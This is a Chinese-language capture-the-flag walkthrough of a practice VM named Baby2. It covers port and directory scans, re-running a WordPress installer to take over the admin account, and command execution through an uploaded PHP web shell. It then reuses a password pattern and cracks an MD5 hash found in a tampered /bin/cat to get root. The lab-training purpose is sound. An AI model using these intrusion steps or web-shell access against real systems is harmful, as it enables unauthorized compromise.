群友靶机Baby2

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:79:15:6b       (Unknown)
192.168.56.108  08:00:27:9a:b0:ac       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.889 seconds (135.52 hosts/sec). 3 responded
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-22 13:55 +08
Nmap scan report for 192.168.56.108
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:9A:B0:AC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.113 -w /usr/share/wordlists/dirbuster/                      
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.113
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 0 / 1 (0.00%)^Z
zsh: suspended  gobuster dir -u http://192.168.56.113 -w /usr/share/wordlists/dirbuster/
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# ls  /usr/share/wordlists/dirbuster/
apache-user-enum-1.0.txt  directories.jbrofuzz    directory-list-2.3-medium.txt  directory-list-lowercase-2.3-medium.txt
apache-user-enum-2.0.txt  directory-list-1.0.txt  directory-list-2.3-small.txt   directory-list-lowercase-2.3-small.txt
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.113 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.113
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 0 / 1 (0.00%)
2025/10/22 13:59:02 error on running gobuster on http://192.168.56.113/: unable to connect to http://192.168.56.113/: Get "http://192.168.56.113/": dial tcp 192.168.56.113:80: connect: no route to host
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt      
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.108
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.108/wordpress/]
/server-status        (Status: 403) [Size: 279]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.108/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.108/wordpress
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 326] [--> http://192.168.56.108/wordpress/admin/]
/plugins              (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/plugins/]
/cms                  (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/cms/]
/tmp                  (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/tmp/]
/layouts              (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/layouts/]
/docu                 (Status: 301) [Size: 325] [--> http://192.168.56.108/wordpress/docu/]
/kategorien           (Status: 301) [Size: 331] [--> http://192.168.56.108/wordpress/kategorien/]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.56.108/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.108/wordpress
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php,php3,txt,html,zip,tar,bk,bak,gz,shtml
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 7197]
/admin                (Status: 301) [Size: 326] [--> http://192.168.56.108/wordpress/admin/]
/plugins              (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/plugins/]
/update.php           (Status: 200) [Size: 0]
/install.php          (Status: 200) [Size: 6943]
/cms                  (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/cms/]
/readme.txt           (Status: 200) [Size: 594]
/tmp                  (Status: 301) [Size: 324] [--> http://192.168.56.108/wordpress/tmp/]
/layouts              (Status: 301) [Size: 328] [--> http://192.168.56.108/wordpress/layouts/]
/gpl.txt              (Status: 200) [Size: 17996]
/docu                 (Status: 301) [Size: 325] [--> http://192.168.56.108/wordpress/docu/]

信息大调查

进wordpress，发现一个服务，大调查cve，发现一个nday
参考文献

深度扫一手，发现install.php，我们先去安装一手，安装过程中可以改密码，这里我就直接改了，然后就可以登录后台了

进后台之后复现这个cve

发现不能更改文件名，丢给ds分析，知道了双击文件名就可以更改文件名

然后访问

1	http://192.168.56.108/wordpress/kategorien/Willkommen/dateien/rev.php?cmd=ls

发现成功回显，然后可以执行任意命令

在/home/aristore目录下发现user的flag，直接rce

1 2	flag{user-b6cc0757c4a3108795d0803f9e82b9d3} aristore:aristorearistore

还有登录的账号密码，ssh连上

┌──(root㉿kali)-[/home/kali]
└─# ssh aristore@192.168.56.108         
aristore@192.168.56.108's password: 
Linux Baby2 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
aristore@Baby2:~$ id
uid=1000(aristore) gid=1000(aristore) groups=1000(aristore)

然后我们可以看到，home目录下依然有一个用户tuf，所以可以尝试切换到tuf，因为aristore的密码是两遍，所以tuf的密码尝试是两遍，成功登录

1 2	tuf@Baby2:/home/aristore$ id uid=1001(tuf) gid=1001(tuf) groups=1001(tuf)

这里也是了解到 dpkg -V排查了

tuf@Baby2:/home/aristore$ dpkg -V
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
??5??????   /bin/cat
dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.conf for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.conf
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.motd for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.motd
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.rules for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.rules
dpkg: warning: packagekit: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla for hash: Permission denied
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla
??5?????? c /etc/issue

丢给ds老师分析
得到结论
/bin/cat - 核心系统工具被修改（高度可疑）

那么就去一探究竟看看

tuf@Baby2:/home/aristore$  strings /bin/cat
#!/bin/bash
[[ "$1" == user.txt ]] && echo "flag{fake-flag}" && exit 1
/usr/bin/cat2 "$@"
# b4b8daf4b8ea9d39568719e1e320076f

可疑的md5，我一撞。rootroot出来了，得到了root的密码，直接切换即可

tuf@Baby2:/home/aristore$ su root
Password: 
root@Baby2:/home/aristore# id
uid=0(root) gid=0(root) groups=0(root)